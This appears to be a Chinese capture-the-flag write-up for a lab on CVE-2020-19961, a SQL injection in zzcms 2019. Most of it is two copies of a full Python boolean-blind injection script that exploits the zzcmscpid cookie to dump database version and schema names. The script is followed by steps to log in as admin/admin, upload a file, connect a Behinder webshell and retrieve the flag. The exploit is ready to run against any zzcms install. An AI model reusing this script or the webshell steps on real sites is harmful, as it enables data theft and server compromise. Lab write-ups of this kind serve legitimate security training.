春秋云镜 CVE-2020-19961 zz cms 2019 存在sql注入漏洞
靶标介绍
zz cms 2019 subzs.php 存在sql注入漏洞
启动场景
漏洞利用
admin/admin登录会员中心后台成功
大佬的布尔盲注exp
#coding: utf-8
import requests
import string
url = 'http://{}/zs/zs_list.php'
#header 头,自己根据实际环境做修改
headers = {
'Host':'{}',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
'Connection':'keep-alive',
'Cookie':'{}'
}
def Sqli(host,sql):
global url
global headers
url = url.format(host)
sqli = "ascii(substr(({}),{},1)))={}"
sqli_2 = "0,(if((({}),1,0)))#"
res_data = ""
s = requests.session()
i = 1
while 1:
tmp_data = res_data
for c in string.printable:
tmp_header = headers['Cookie']
sqli_data = sqli_2.format(sqli.format(sql,str(i),ord(c)))
sqli_data = sqli_data.replace(' ','/**/')
headers['Cookie'] = headers['Cookie'] + "; zzcmscpid=" + sqli_data
res = s.get(url, headers=headers)
if "οnlοad='resizeimg(60,60,this)'" in res.text: #自己根据实际环境做修改
headers['Cookie'] = tmp_header
res_data += c
print (res_data)
break
headers['Cookie'] = tmp_header
i += 1
if tmp_data == res_data:
print ('完成')
return
if __name__ == "__main__":
#设置 host 地址
host = "127.0.0.1:9000"
#设置用户 cookie
user_cookie = "PHPSESSID=89m7nn9g388n5il12dde5cb9kp; UserName=test; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
sql = "select group_concat(user(),version(),@@version_compile_os)"
headers['Host'] = headers['Host'].format(host)
headers['Cookie'] = headers['Cookie'].format(user_cookie)
Sqli(host,sql)
获取所有数据库
#coding: utf-8
import requests
import string
url = 'http://{}/zs/zs_list.php'
#header 头,自己根据实际环境做修改
headers = {
'Host':'eci-2ze91hjzahykfmrparko.cloudeci1.ichunqiu.com',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
'Connection':'keep-alive',
'Cookie':'Hm_lvt_2d0601bd28de7d49818249cf35d95943=1690683412,1690958420,1691372705,1691455849; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1691473990; __51cke__=; __tins__713776=%7B%22sid%22%3A%201691474062770%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201691475864605%7D; __51laig__=2; PHPSESSID=sbeiij1sjc0a2t4lpaql0jl1l3; UserName=admin; PassWord=21232f297a57a5a743894a0e4a801fc3'
}
def Sqli(host,sql):
global url
global headers
url = url.format(host)
sqli = "ascii(substr(({}),{},1)))={}"
sqli_2 = "0,(if((({}),1,0)))#"
res_data = ""
s = requests.session()
i = 1
while 1:
tmp_data = res_data
for c in string.printable:
tmp_header = headers['Cookie']
sqli_data = sqli_2.format(sqli.format(sql,str(i),ord(c)))
sqli_data = sqli_data.replace(' ','/**/')
headers['Cookie'] = headers['Cookie'] + "; zzcmscpid=" + sqli_data
res = s.get(url, headers=headers)
if "οnlοad='resizeimg(60,60,this)'" in res.text: #自己根据实际环境做修改
headers['Cookie'] = tmp_header
res_data += c
print (res_data)
break
headers['Cookie'] = tmp_header
i += 1
if tmp_data == res_data:
print ('完成')
return
if __name__ == "__main__":
#设置 host 地址
host = "eci-2ze91hjzahykfmrparko.cloudeci1.ichunqiu.com"
#设置用户 cookie
user_cookie = "PHPSESSID=sbeiij1sjc0a2t4lpaql0jl1l3; UserName=test; PassWord=21232f297a57a5a743894a0e4a801fc3"
sql = "select group_concat((select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),2,3)"
headers['Host'] = headers['Host'].format(host)
headers['Cookie'] = headers['Cookie'].format(user_cookie)
Sqli(host,sql)
未找到flag,尝试上传文件获取falg
,/admin
进入管理界面
admin/admin登录管理后台成功
冰蝎连接webshell
得到flag
flag{efgeca1b-e165-4a67-95c9-caceea1a4770}